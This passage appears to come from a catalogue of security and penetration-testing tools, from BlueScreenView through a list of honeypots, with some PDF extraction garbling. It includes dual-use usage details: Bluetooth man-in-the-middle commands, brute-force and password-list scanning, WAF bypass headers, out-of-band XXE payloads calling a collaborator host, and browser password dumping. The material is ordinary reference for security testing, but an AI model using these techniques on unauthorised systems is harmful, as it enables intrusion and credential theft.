made from the user interface. The <column>
the first column, 1 for the second column, and
so on) or the name of the column, like "Bug
Check Code" and "Crash Time". You can
specify the '~' prefix character (e.g: "~Crash
Time") if you want to sort in descending
order. You can put multiple /sort in the
command-line if you want to sort by multiple
columns. Examples:
BlueScreenView.exe /shtml "f:\temp
\crashes.html" /sort 2 /sort ~1
BlueScreenView.exe /shtml "f:\temp
\crashes.html" /sort "Bug Check String" /sort
"~Crash Time"
/nosort

Download BlueScreenView
BLUTO - DNS RECON, DNS ZONE TRANSFER, AND EMAIL
ENUMERATION
BLUTODNS recon | Brute forcer | DNS Zone Transfer |
Email Enumeration
The target domain is queried for MX and NS records. Subdomains are passively gathered via NetCraft. The target
domain NS records are each queried for potential Zone
Transfers. If none of them gives up their spinach, Bluto will
brute force subdomains using parallel sub processing on the
top 20000 of the 'The Alexa Top 1 Million subdomains'.
NetCraft results are presented individually and are then
compared to the brute force results, any duplications are
removed and particularly interesting results are highlighted.

Bluto now does email address enumeration based on the target
domain, currently using Bing and Google search engines. It is
configured in such a way to use a random User Agent: on
each request and does a country look up to select the fastest
Google server in relation to your egress address. Each request
closes the connection in an attempt to further avoid captchas,
however exsesive lookups will result in captchas (Bluto will
warn you if any are identified).
Bluto requires various other dependencies. So to make things
as easy as possible, pip is used for the installation. This does
mean you will need to have pip installed prior to attempting the
Bluto install.
Pip Install Instructions
Note: To test if pip is already installed execute.

pip -V
(1) Mac and Kali users can simply use the following command
to download and install pip.
curl https://bootstrap.pypa.io/get-pip.py -o - | python
Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we
can install Bluto:

sudo pip install git+git://github.com/RandomStorm/Bluto
(2) You should now be able to execute 'bluto' from any working
directory in any terminal.
bluto
Upgrade Instructions
(1) The upgrade process is as simple as;

sudo pip install git+git://github.com/RandomStorm/Bluto
--upgrade
Download Bluto
BOHATEI - FLEXIBLE AND ELASTIC DDOS DEFENSE
Bohatei is a first of its kind platform that enables flexible and

elastic DDoS defense using SDN and NFV.
The repository contains a first version of the components
described in the Bohatei paper, as well as a web-based User
Interface. The backend folder consists of :
an implementation of the FlowTags framework for the
OpenDaylight controller
an implementation of the resource management
algorithms
a topology file that was used to simulate an ISP topology
scripts that facilitate functions such as spawning, tearing
down and retrieving the topology.
scripts that automate and coordinate the components
required for the usecases examined.
The frontend folder contains the required files for the web
interface.
For the experiments performed, we used a set of VM images
that contain implementations of the strategy graphs for each
type of attack (SYN Flood, UDP Flood, DNS Amplification and
Elephant Flow). Those images will become available at a later
stage. The tools that were used for those strategy graphs are
the following:
Bro
Snort
Balancer
Iptables
Iperf
Custom scripts to simulate the attacks
Bohatei Paper
Bohatei Slides
Video
DownloadBohatei
BRUTEX - AUTOMATICALLY BRUTE FORCE ALL
SERVICES RUNNING ON A TARGET
Automatically brute force all services running on a target

including:
Open ports
DNS domains
Web files
Web directories
Usernames
Passwords
USAGE
./brutex target
DEPENDENCIES
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict
To brute force multiple hosts, use brutex-massscan and include

the IP's/hostnames to scan in the targets.txt file.
Download BruteX
BTPROXY - MAN IN THE MIDDLE ANALYSIS TOOL FOR
BLUETOOTH
Tested Devices
Pebble Steel smart watch
Moto 360 smart watch
OBDLink OBD-II Bluetooth Dongle
Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp
(at) vt (dot) edu.
Dependencies
Need at least 1 Bluetooth card (either USB or internal).
Need to be running Linux, another *nix, or OS X.

BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools
libbluetooth-dev python-dev
Installation
sudo python setup.py install
Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device
and
# wait for a connection from the master F1:64:F3:31:67:88
device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave mac
address is typically the other peripherial device (smart watch,
headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and
the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master
connects to the proxy device, you will be able to see traffic and
modify it.
How to find the BT MAC Address?
Well, you can look it up in the settings usually for a phone. The
most robost way is to put the device in advertising mode and
scan for it.
There are two ways to scan for devices: scanning and inquiring.
hcitool can be used to do this:
hcitool scan
hcitool inq
To get a list of services on a device:

sdptool records <bt-address>
Usage
Some devices may restrict connecting based on the name,
class, or address of another bluetooth device.
So the program will lookup those three properties of the target
devices to be proxied, and then clone them onto the proxying
adapter(s).
Then it will first try connecting to the slave device from the
cloned master adaptor. It will make a socket for each service
hosted by the slave and relay traffic for each one
independently.
After the slave is connected, the cloned slave adaptor will be
set to be listening for a connection from the master. At this
point, the real master device should connect to the adaptor.
After the master connects, the proxied connection is complete.
Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use
one adapter, then only the slave device will be cloned. Both
devices will be cloned if 2 adapters are used; this might be
necessary for more restrictive Bluetooth devices.
Advanced Usage
Manipulation of the traffic can be handled via python by passing
an inline script. Just implement the master_cb and slave_cb
callback functions. This are called upon receiving data and the
returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
"""
Received something from master, about to be sent
to slave.
"""
print '<< ', repr(req)
open('mastermessages.log', 'a+b').write(req)
return req
def slave_cb(res):
"""
Same as above but it's from slave about to be
sent to master
"""
print '>> ', repr(res)
open('slavemessages.log', 'a+b').write(res)
return res
Also see the example functions for manipulating Pebble watch

traffic in replace.py
This code can be edited and reloaded during runtime by
entering 'r' into the program console. This avoids the pains of
reconnecting. Any errors will be caught and regular
transmission will continue.
TODO
BLE
Improve the file logging of the traffic and make it more
interactive for
replays/manipulation.
Indicate which service is which in the output.
Provide control for disconnecting/connecting services.
PCAP file support
ncurses?
How it works
This program starts by killing the bluetoothd process, running it
again with a LD_PRELOAD pointed to a wrapper for the bind
system call to block bluetoothd from binding to L2CAP port 1

(SDP). All SDP traffic goes over L2CAP port 1 so this makes it
easy to MiTM/forward between the two devices and we don't
have to worry about mimicking the advertising.
The program first scans each device for their name and device
class to make accurate clones. It will append the string
'_btproxy' to each name to make them distinguishable from a
user perspective. Alternatively, you can specify the names to
use at the command line.
The program then scans the services of the slave device. It
makes a socket connection to each service and open a
listening port for the master device to connect to. Once the
master connects, the Proxy/MiTM is complete and output will
be sent to STDOUT.
Notes
Some bluetooth devices have different methods of pairing
which makes this process more complicated. Right now it
supports SPP and legacy pin pairing.
This program doesn't yet have support for Bluetooth Low
Energy. A similiar approach to BLE can be taken.
Errors
btproxy or bluetoothd hangs
If you are using bluez 5, you should try uninstalling and
installing bluez 4 . I've had problems with bluez 5 hanging.
error accessing bluetooth device
Make sure the bluetooth adaptors are plugged in and enabled.
Run
# See the list of all adaptors
hciconfig -a
# Enable
sudo hciconfig hciX up

# if you get this message
Can't init device hci0: Operation not possible due to
RF-kill (132)
# Then try unblocking it with the rfkill command
sudo rfkill unblock all
UserWarning: <path>/.python-eggs is writable by group/

others
Fix
chmod g-rw,o-x <path>/.python-eggs
Download Btproxy
BURP SUITE PROFESSIONAL 1.6.26 - THE LEADING
TOOLKIT FOR WEB APPLICATION SECURITY TESTING
Burp Suite is an integrated platform for performing security

testing of web applications. Its various tools work seamlessly
together to support the entire testing process, from initial
mapping and analysis of an application's attack surface,
through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced
manual techniques with state-of-the-art automation, to make
your work faster, more effective, and more fun.

Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify
traffic between your browser and the target application.
An application-aware Spider, for crawling content and
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
Burp is easy to use and intuitive, allowing new users to begin
working right away. Burp is also highly configurable, and
contains numerous powerful features to assist the most
experienced testers with their work.
Release Notesv1.6.26
This release adds the ability to detect blind server-side XML/

SOAP injection by triggering interactions with Burp
Collaborator.
Previously, Burp Scanner has detected XML/SOAP injection by

submitting some XML-breaking syntax like:
]]>>
and analyzing responses for any resulting error messages.

Burp now sends payloads like:
<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a.b/ http://
kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
nzf</nzf>
and reports an appropriate issue based on any observed

interactions (DNS or HTTP) that reach the Burp Collaborator
server.
Note that this type of technique is effective even when the
original parameter value does not contain XML, and there is no
indication within the request or response that XML/SOAP is
being used on the server side.
The new scan check uses both schema location and
XInclude to cause the server-side XML parser to interact with
the Collaborator server.
In addition, when the original parameter value does contain
XML being submitted by the client, Burp now also uses the
schema location and XInclude techniques to try to induce
external service interactions. (We believe that Burp is now
aware of all available tricks for inducing a server-side XML
parser to interact with an external network service. But we
would be very happy to hear of any others that people know
about.)
DownloadBurp Suite Professional 1.6.26

BURP SUITE PROFESSIONAL V1.6.16 - THE LEADING


functionality.
requests.
tokens.
within Burp.
Release Notes
v1.6.15
This release introduces a brand new feature: Burp
Collaborator.
Burp Collaborator is an external service that Burp can use to
help discover many kinds of vulnerabilities, and has the
potential to revolutionize web security testing. In the coming
months, we will be adding many exciting new capabilities to
Burp, based on the Collaborator technology.

Read today's blog post: Introducing Burp Collaborator
Read the full Burp Collaborator documentation
This release is officially beta due to the introduction of some
new types of Scanner checks, and the reliance on a new
service infrastructure. However, we have tested the new
capabilities thoroughly and are not aware of any stability
issues.
v1.6.16
This release fixes some issues with yesterday's beta release of

the new Burp Collaborator feature, including a bug that may
cause Burp to sometimes send some Collaborator-related test
payloads even if the user has disabled use of the Collaborator
feature.
This release is still officially beta while we monitor the Burp
Collaborator capabilities for any further issues.
Download Burp Suite Professional

BURP SUITE PROFESSIONAL V1.6.23 - THE LEADING

functionality.
requests.
tokens.
within Burp.

Release Notes
v1.6.23
This release adds a new scan check for external service
interaction and out-of-band resource load via injected XML
doctype tags containing entity parameters. Burp now sends
payloads like:
<?xml version='1.0' standalone='no'?><!DOCTYPE
foo [<!ENTITY % f5a30 SYSTEM "http://
u1w9aaozql7z31394loost.burpcollaborator.net">
%f5a30; ]>
and reports an appropriate issue based on any observed
interactions (DNS or HTTP) that reach the Burp Collaborator
server.
The release also fixes some issues:
Some bugs affecting the saving and restoring of Burp

state files.
A bug in the Collaborator server where the auto-generated
self-signed certificate does not use a wildcard prefix in the
CN. This issue only affects private Collaborator server
deployments where a custom SSL certificate has not been
configured.
DownloadBurp Suite Professional v1.6.23

BURPKIT - NEXT-GEN BURPSUITE PENETRATION
TESTING TOOL
Welcome to the next generation of web application penetration

testing - using WebKit to own the web. BurpKit is a BurpSuite
plugin which helps in assessing complex web apps that render
the contents of their pages dynamically. It also provides a bidirectional JavaScript bridge API which allows users to create
quick one-off BurpSuite plugin prototypes which can interact
directly with the DOM and Burp's extender API.
System Requirements
BurpKit has the following system requirements:

Oracle JDK >=8u50 and <9 ( Download )
At least 4GB of RAM
Installation
Installing BurpKit is simple:

1. Download the latest prebuilt release from the GitHub
releases page .
2. Open BurpSuite and navigate to the Extender tab.
3. Under Burp Extensions click the Add button.
4. In the Load Burp Extension dialog, make sure that
Extension Type is set to Java and click the Select
file ... button underExtension Details .
5. Select the BurpKit-<version>.jar file and click Next
when done.
If all goes well, you will see three additional top-level tabs
appear in BurpSuite:
1. BurpKitty : a courtesy browser for navigating the web
within BurpSuite.
2. BurpScript IDE : a lightweight integrated development
environment for writing JavaScript-based BurpSuite
plugins and other things.
3. Jython : an integrated python interpreter console and
lightweight script text editor.
BurpScript
BurpScript enables users to write desktop-based JavaScript

applications as well as BurpSuite extensions using the
JavaScript scripting language. This is achieved by injecting two
new objects by default into the DOM on page load:
1. burpKit : provides numerous features including file
system I/O support and easy JS library injection.

2. burpCallbacks : the JavaScript equivalent of the
IBurpExtenderCallbacks interface in Java with a few
slight modifications.
Take a look at the examples folder for more information.
More Information?
A readable version of the docs can be found at here
Download Burpkit
BWA - OWASP BROKEN WEB APPLICATIONS PROJECT
A collection of vulnerable web applications that is distributed on

a Virtual Machine.
Description
The Broken Web Applications (BWA) Project produces a Virtual

Machine running a variety of applications with known
vulnerabilities for those interested in:
learning about web application security
testing manual assessment techniques
testing automated tools

testing source code analysis tools
observing web attacks
testing WAFs and similar code technologies
All the while saving people interested in doing either learning or

testing the pain of having to compile, configure, and catalog all
of the things normally involved in doing this process from
scratch.
DownloadOWASP Broken Web Applications Project

BYPASSWAF - BURP PLUGIN TO BYPASS SOME WAF
DEVICES
Add headers to all Burp requests to bypass some WAF

products. This extension will automatically add the following
headers to all requests.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Usage
Steps include:
1. Add extension to burp
2. Create a session handling rule in Burp that invokes this
extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away
Read morehere.
Features
All of the features are based on Jason Haddix's work found

here, and Ivan Ristic's WAF bypass work found here and here.
Bypass WAF contains the following features:
A description of each feature follows:

1. Users can modify the X-Originating-IP, X-Forwarded-For,
2.
3.
4.
5.
6.
7.
X-Remote-IP, X-Remote-Addr headers sent in each

request. This is probably the top bypass technique i the
tool. It isn't unusual for a WAF to be configured to trust
itself (127.0.0.1) or an upstream proxy device, which is
what this bypass targets.
The "Content-Type" header can remain unchanged in
each request, removed from all requests, or by modified to
one of the many other options for each request. Some
WAFs will only decode/evaluate requests based on known
content types, this feature targets that weakness.
The "Host" header can also be modified. Poorly
configured WAFs might be configured to only evaluate
requests based on the correct FQDN of the host found in
this header, which is what this bypass targets.
The request type option allows the Burp user to only use
the remaining bypass techniques on the given request
method of "GET" or "POST", or to apply them on all
requests.
The path injection feature can leave a request unmodified,
inject random path info information (/path/to/example.php/
randomvalue?restofquery), or inject a random path
parameter
(/path/to/
example.php;randomparam=randomvalue?resetofquery).
This can be used to bypass poorly written rules that rely
on path information.
The path obfuscation feature modifies the last forward
slash in the path to a random value, or by default does
nothing. The last slash can be modified to one of many
values that in many cases results in a still valid request
but can bypass poorly written WAF rules that rely on path
information.
The parameter obfuscation feature is language specific.
PHP will discard a + at the beginning of each parameter,
but a poorly written WAF rule might be written for specific
parameter names, thus ignoring parameters with a + at
the beginning. Similarly, ASP discards a % at the
beginning of each parameter.

8. The "Set Configuration" button activates all the settings
that you have chosen.
All of these features can be combined to provide multiple
bypass options.
DownloadBypassWAF
CAPTIPPER - MALICIOUS HTTP TRAFFIC EXPLORER
TOOL
CapTipper is a python tool to analyze, explore and revive HTTP

malicious traffic.
CapTipper sets up a web server that acts exactly as the server
in the PCAP file,and contains internal tools, with a powerful
interactive console, for analysis and inspection of the hosts,
objects and conversations found.
The tool provides the security researcher with easy access to
the files and the understanding of the network flow,and is useful
when trying to research exploits, pre-conditions, versions,

obfuscations, plugins and shellcodes.
Feeding CapTipper with a drive-by traffic capture (e.g of an
exploit kit) displays the user with the requests URI's that were
sent and responses meta-data.
The user can at this point browse to http://127.0.0.1/[URI] and
receive the response back to the browser.
In addition, an interactive shell is launched for deeper
investigation using various commands such as: hosts,
hexdump, info, ungzip, body, client, dump and more...
Download CapTipper
CENOCIPHER - EASY-TO-USE, END-TO-END ENCRYPTED
COMMUNICATIONS TOOL
CenoCipher is a free, open-source, easy-to-use tool for

exchanging secure encrypted communications over the
internet. It uses strong cryptography to convert messages and
files into encrypted cipher-data, which can then be sent to the
recipient via regular email or any other channel available, such
as instant messaging or shared cloud storage.
FEATURES AT A GLANCE
Simple for anyone to use. Just type a message, click

Encrypt, and go
Handles messages and file attachments together easily
End-to-end encryption, performed entirely on the user's
machine
No dependence on any specific intermediary channel.
Works with any communication method available

Uses three strong cryptographic algorithms in combination
to triple-protect data
Optional steganography feature for embedding encrypted
data within a Jpeg image
No installation needed - fully portable application can be
run from anywhere
Unencrypted data is never written to disk - unless
requested by the user
Multiple input/output modes for convenient operation
TECHNICAL DETAILS
Open source, written in C++

AES/Rijndael, Twofish and Serpent ciphers (256-bit
keysize variants), cascaded together in CTR mode for
triple-encryption of messages and files
HMAC-SHA-256 for construction of message
authentication code
PBKDF2-HMAC-SHA256 for derivation of separate AES,
Twofish and Serpent keys from user-chosen passphrase
Cryptographically safe pseudo-random number generator
ISAAC for production of Initialization Vectors (AES/
Twofish/Serpent) and Salts (PBKDF2)
VERSION HISTORY (CHANGE LOG)

VERSION 4.0 (DECEMBER 05, 2015)
Drastically overhauled and streamlined interface

Added multiple input/output modes for cipher-data
Added user control over unencrypted disk writes
Added auto-decrypt and open-with support
Added more entropy to Salt/IV generation
VERSION 3.0 (JUNE 29, 2015)
Added Serpent algorithm for cascaded triple-encryption

Added steganography option for concealing data within
Jpeg
Added conversation mode for convenience
Improved header obfuscation for higher security
Increased entropy in generation of separate salt/IVs used
by ciphers
Many other enhancements under the hood
VERSION 2.1 (DECEMBER 6, 2014)
Change cascaded encryption cipher modes from CBC to

CTR for extra security
Improve PBKDF2 rounds determination and conveyance
format
Fix minor bug related to Windows DPI font scaling
Fix minor bug affecting received filenames when saved by
user
VERSION 2.0 (NOVEMBER 26, 2014)
Initial open-source release

Many enhancements to encryption algorithms and hash
functions
VERSION 1.0 (JUNE 10, 2014)
Original program release (closed source / beta)
DownloadCenoCipher
CHEAT - CREATE AND VIEW INTERACTIVE
CHEATSHEETS ON THE COMMAND-LINE
cheat allows you to create and view interactive cheatsheets on
the command-line. It was designed to help remind *nix system

administrators of options for commands that they use
frequently, but not frequently enough to remember.
cheat depends only on python and pip.
Example
The next time you're forced to disarm a nuclear weapon without

consulting Google, you may run:
cheat tar
You will be presented with a cheatsheet resembling:

# To extract an uncompressed archive:
tar -xvf /path/to/foo.tar
# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz
# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/
# To extract a .bz2 archive:

tar -xjvf /path/to/foo.tgz
# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/
To see what cheatsheets are availble, run cheat -l.

Note that, while cheat was designed primarily for *nix system
administrators, it is agnostic as to what content it stores. If you
would like to use cheat to store notes on your favorite cookie
recipes, feel free.
Installing
Using pip
sudo pip install cheat
Using homebrew
brew install cheat
Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Then, clone this repository, cd into it, and run:

sudo python setup.py install
Modifying Cheatsheets
The value of cheat is that it allows you to create your own

cheatsheets - the defaults are meant to serve only as a starting
point, and can and should be modified.
Cheatsheets are stored in the ~/.cheat/ directory, and are
named on a per-keyphrase basis. In other words, the content
for the tar cheatsheet lives in the ~/.cheat/tar file.
Provided that you have an EDITOR environment variable set,

you may edit cheatsheets with:
cheat -e foo
If the 'foo' cheatsheet already exists, it will be opened for

editing. Otherwise, it will be created automatically.
After you've customized your cheatsheets, I urge you to track
~/.cheat/ along with your dotfiles.
Download Cheat
CHROME AUTOFILL VIEWER - TOOL TO VIEW OR DELETE
AUTOCOMPLETE DATA FROM GOOGLE CHROME
BROWSER
Chrome Autofill Viewer is the free tool to easily see and

delete all your autocomplete data from Google Chrome
browser.
Chrome stores Autofill entries (typically form fields) such as
login name, pin, passwords, email, address, phone, credit/debit
card number, search history etc in an internal database file.
'Chrome Autofill Viewer' helps you to automatically find and
view all the Autofill history data from Chrome browser. For each
of the entry, it display following details,

Field Name
Value
Total Used Count
First Used Date
Last Used Date
You can also use it to view from history file belonging to
another user on same or remote system. It also provides
one click solution to delete all the displayed Autofill data from
the history file.
It is very simple to use for everyone, especially makes it handy
tool for Forensic investigators.
Chrome Autofill Viewer is fully portable and works on both 32bit & 64-bit platforms starting from Windows XP to Windows 8.
Features
Instantly view all the Autofill list from Chrome browser

On startup, it auto detects Autofill file from Chrome's
default profile location
Sort feature to arrange the data in various order to make it
easier to search through 100's of entries.
Delete all the Autofill data with just a click of button
Save the displayed Autofill list to HTML/XML/TEXT/CSV
file
Easier and faster to use with its enhanced user friendly
GUI interface
Fully Portable, does not require any third party
components like JAVA, .NET etc
Support for local Installation and uninstallation of the
software
How to Use?
Chrome Autofill Viewer is easy to use with its simple GUI
interface.
Here are the brief usage details
Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill
file from default profile location of Chrome. You can also
select the desired file manually.
Next click on 'Show All' button and all stored Autofill data
will be displayed in the list as shown in screenshot 1
below.
If you want to remove all the entries, click on 'Delete All'
button below.
Finally you can save all displayed entries to HTML/XML/
TEXT/CSV file by clicking on 'Export' button and then
select the type of file from the drop down box of 'Save File
Dialog'.
DownloadChrome Autofill Viewer

CHROMEPASS - CHROME BROWSER PASSWORD
RECOVERY TOOL
ChromePass is a small password recovery tool that allows you

to view the user names and passwords stored by Google
Chrome Web browser. For each password entry, the following

information is displayed: Origin URL, Action URL, User Name
Field, Password Field, User Name, Password, and Created
Time.
You can select one or more items and then save them into text/
html/xml file or copy them to the clipboard.
Using ChromePass
ChromePass doesn't require any installation process or

additional DLL files. In order to start using ChromePass, simply
run the executable file - ChromePass.exe After running it, the
main window will display all passwords that are currently stored
in your Google Chrome browser.
Reading ChromePass passwords from external drive
Starting from version 1.05, you can also read the passwords
stored by Chrome Web browser from an external profile in your
current operating system or from another external drive (For
example: from a dead system that cannot boot anymore). In
order to use this feature, you must know the last logged-on
password used for this profile, because the passwords are
encrypted with the SHA hash of the log-on password, and
without that hash, the passwords cannot be decrypted.
You can use this feature from the UI, by selecting the
'Advanced Options' in the File menu, or from command-line, by
using /external parameter. The user profile path should be
something like "C:\Documents and Settings\admin" in Windows
XP/2003 or "C:\users\myuser" in Windows Vista/2008.
/stext <Filename>
Save the list of passwords into a

regular text file.
/stab <Filename>

/scomma <Filename>

comma-delimited text file.
/stabular <Filename>

tabular text file.
/shtml <Filename>
Save the list of passwords into

/sverhtml <Filename>
Save the list of passwords into

/sxml <Filename>
Save the list of passwords to

XML file.
/skeepass <Filename>
Save the list of passwords to

KeePass csv file.
/external <User Profile

Path> <Last Log-On
Password>
Load the Chrome passwords

from external drive/profile. For
example:
chromepass.exe /external "C:
\Documents and Settings\admin"
"MyPassword"
DownloadChromePass
CMSMAP - SCANNER TO DETECT SECURITY FLAWS OF
THE MOST POPULAR CMSS (WORDPRESS, JOOMLA AND
DRUPAL)
CMSmap is a python open source CMS scanner that

automates the process of detecting security flaws of the most
popular CMSs. The main purpose of CMSmap is to integrate
common vulnerabilities for different types of CMSs in a single
tool.
At the moment, CMSs supported by CMSmap are WordPress,
Joomla and Drupal.
Please note that this project is an early state. As such, you
might find bugs, flaws or mulfunctions. Use it at your own risk!
Installation
You can download the latest version of CMSmap by cloning the

GitHub repository:
git clone https://github.com/Dionach/CMSmap.git
Usage
CMSmap tool v0.3 - Simple CMS Scanner

Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
-t, --target
target URL (e.g. 'https://
abc.test.com:8080/')
-v, --verbose
verbose mode (Default: false)
-T, --threads
number of threads (Default: 5)
-u, --usr
username or file
-p, --psw
password or file
-i, --input
scan multiple targets listed in
a given text file

-o, --output
save output in a file
-k, --crack
password hashes file
-w, --wordlist
wordlist file (Default:
rockyou.txt - WordPress only)

-a, --agent
set custom user-agent
-U, --update
(C)MSmap, (W)ordpress plugins
and themes, (J)oomla components, (D)rupal modules

-f, --force
force scan (W)ordpress,
(J)oomla or (D)rupal
-F, --fullscan
full scan using large plugin
lists. Slow! (Default: false)

-h, --help
show this help
Example: cmsmap.py -t https://example.com

cmsmap.py -t https://example.com -f W -F
cmsmap.py -t https://example.com -i targets.txt
-o output.txt
cmsmap.py -t https://example.com -u admin -p
passwords.txt
cmsmap.py -k hashes.txt
Download CMSmap
CODETAINER - A DOCKER CONTAINER IN YOUR
BROWSER
codetainer allows you to create code 'sandboxes' you can
embed in your web applications (think of it like an OSS clone of

codepicnic.com ).
Codetainer runs as a webservice and provides APIs to create,

view, and attach to the sandbox along with a nifty HTML
terminal you can interact with the sandbox in realtime. It uses
Docker and its introspection APIs to provide the majority of this
functionality.
Codetainer is written in Go. For more information, see the
slides from a talk introduction .
Build & Installation

Requirements
Docker >=1.8 (required for file upload API)

Go >=1.4
godep
Building & Installing From Source

# set your $GOPATH
go get github.com/codetainerapp/codetainer
# you may get errors about not compiling due to Asset
missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps
# if you need the dependencies like
godep
make
This will create ./bin/codetainer.

Configuring Docker
You must configure Docker to listen on a TCP port.

DOCKER_OPTS="-H tcp://127.0.0.1:4500 -H unix:///var/run/
docker.sock"
Configuring codetainer
See ~/.codetainer/config.toml. This file will get auto-generated

the first time you run codetainer, please edit defaults as
appropriate.
# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500
# Enable TLS support (optional, if you access to Docker
API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
#
e.g. if you use Docker Machine: "~/.docker/machine/
certs"
# DockerCertPath = "/path/to/certs"
# Database path (optional, default is ~/.codetainer/
codetainer.db)
# DatabasePath = "/path/to/codetainer.db"
Running an example codetainer

$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server
# to start the API server on port
3000
Embedding a codetainer in your web app

1. Copy codetainer.js to your webapp.
2. Include codetainer.js and jquery in your web page.
Create a div to house the codetainer terminal iframe (it's
#terminal in the example below).
<!DOCTYPE html>
3. <html>
4. <head>
5.
<meta charset="UTF-8">
6.
<title>lsof tutorial</title>
7.
<link rel='stylesheet' href='/stylesheets/

style.css' />
8.
<script src="http://code.jquery.com/
jquery-1.10.1.min.js"></script>
9.
<script src="/javascripts/codetainer.js"></script>
10.
<script src="/javascripts/lsof.js"></script>
11. </head>
12. <body>
13.
<div id="terminal" data-container="YOUR CODETAINER

ID HERE">
14. </body>
15. </html>
16. Run the javascript to load the codetainer iframe from the
codetainer API server (supply data-container as the id
of codetainer on the div, or supplycodetainer in the
constructor options).
$('#terminal').codetainer({
terminalOnly: false,
// set to true
to show only a terminal window

url: "http://127.0.0.1:3000",
codetainer server URL
container: "YOUR CONTAINER ID HERE",
width: "100%",
// replace with
height: "100%",
});
Download Codetainer
COLLECTION OF AWESOME HONEYPOTS
A curated list of awesome honeypots, tools, components and

much more. The list is divided into categories such as web,
services, and others, focusing on open source projects.
HONEYPOTS
Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases ( only redis for now)
- The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot
Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - - A simple and effective
phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication
honeyPot
Shadow Daemon - A modular Web Application
Firewall / High-Interaction Honeypot for PHP, Perl &
Python apps
Servletpot - Web application Honeypot
Google Hack Honeypot - designed to provide
reconnaissance against attackers that use search
engines as a hacking tool against your resources.
smart-honeypot - PHP Script demonstrating a smart
honey pot
HonnyPotter - A WordPress login honeypot for
collection and analysis of failed login attempts.
wp-smart-honeypot - WordPress plugin to reduce
comment spam with a smarter honeypot
wordpot - A WordPress Honeypot
Bukkit Honeypot Honeypot - A honeypot plugin for
Bukkit
Laravel Application Honeypot - Honeypot - Simple
spam prevention package for Laravel applications
stack-honeypot - Inserts a trap for spam bots into
responses
EoHoneypotBundle - Honeypot type for Symfony2
forms
shockpot - WebApp Honeypot for detecting Shell
Shock exploit attempts
Service Honeypots
Kippo - Medium interaction SSH honeypot
honeyntp - NTP logger/honeypot
honeypot-camera - observation camera honeypot
troje - a honeypot built around lxc containers. It will
run each connection with the service within a
seperate lxc container.
slipm-honeypot - A simple low-interaction port
monitoring honeypot
HoneyPy - A low interaction honeypot
Ensnare - Easy to deploy Ruby honeypot
RDPy - A Microsoft Remote Desktop Protocol (RDP)
honeypot in python
Anti-honeypot stuff
kippo_detect - This is not a honeypot, but it detects
kippo. (This guy has lots of more interesting stuff)
ICS/SCADA honeypots
Conpot - ICS/SCADA honeypot
scada-honeynet - mimics many of the services from a
popular PLC and better helps SCADA researchers
understand potential risks of exposed control system
devices
SCADA honeynet - Building Honeypots for Industrial
Networks
Deployment
Dionaea and EC2 in 20 Minutes - a tutorial on setting
up Dionaea on an EC2 instance
honeypotpi - Script for turning a Raspberry Pi into a
Honey Pot Pi
Data Analysis
Kippo-Graph - a full featured script to visualize
statistics from a Kippo SSH honeypot

Kippo stats - Mojolicious app to display statistics for
your kippo SSH honeypot
Other/random
NOVA uses honeypots as detectors, looks like a
complete system.
Open Canary - A low interaction honeypot intended
to be run on internal networks.
libemu - Shellcode emulation library, useful for
shellcode detection.
Open Relay Spam Honeypot
SpamHAT - Spam Honeypot Tool
Botnet C2 monitor
Hale - Botnet command & control monitor
IPv6 attack detection tool
ipv6-attack-detector - Google Summer of Code 2012
project, supported by The Honeynet Project
organization
Research Paper
vEYE - behavioral footprinting for self-propagating
worm detection and profiling
Honeynet statistics
HoneyStats - A statistical view of the recorded
activity on a Honeynet
Dynamic code instrumentation toolkit
Frida - Inject JavaScript to explore native apps on
Windows, Mac, Linux, iOS and Android
Front-end for dionaea
DionaeaFR - Front Web to Dionaea low-interaction
honeypot
Tool to convert website to server honeypots
HIHAT - ransform arbitrary PHP applications into
web-based high-interaction Honeypots
Malware collector
Kippo-Malware - Python script that will download all
malicious files stored as URLs in a Kippo SSH
honeypot database
